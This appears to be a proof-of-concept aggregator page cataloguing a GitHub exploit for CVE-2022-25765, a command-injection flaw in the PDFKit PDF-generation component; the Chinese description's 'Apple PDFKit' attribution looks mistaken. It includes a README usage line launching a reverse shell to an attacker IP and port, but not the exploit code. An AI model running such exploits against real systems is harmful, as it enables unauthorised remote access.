CVE-2022-25765 PoC — Apple PDFKit 安全漏洞

Source

https://github.com/lowercasenumbers/CVE-2022-25765

Associated Vulnerability

Title:Apple PDFKit 安全漏洞 (CVE-2022-25765)
Description:Apple PDFKit是美国苹果（Apple）公司的其中的一个PDF文档生成组件。 Apple PDFKit 存在安全漏洞，攻击者可利用该漏洞执行非法命令。

Description

Exploit for CVE-2022-25765

Readme

# CVE-2022-25765 Exploit
A small POC exploit for CVE-2022-25765, PDFkit-CMD-Injection

Example usage: `python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 4444`

This POC takes advantage of a Command Injection vulnerability where the URL is not properly sanitized. This exploit takes an attacker's IP and Port as paramaters to be used for a reverse shell.

File Snapshot


 [4.0K]  /data/pocs/faf626638dbe3f777691ced1ed8f2ec1c29b3092
├── [5.2K]  cve-2022-25765.py
└── [ 374]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!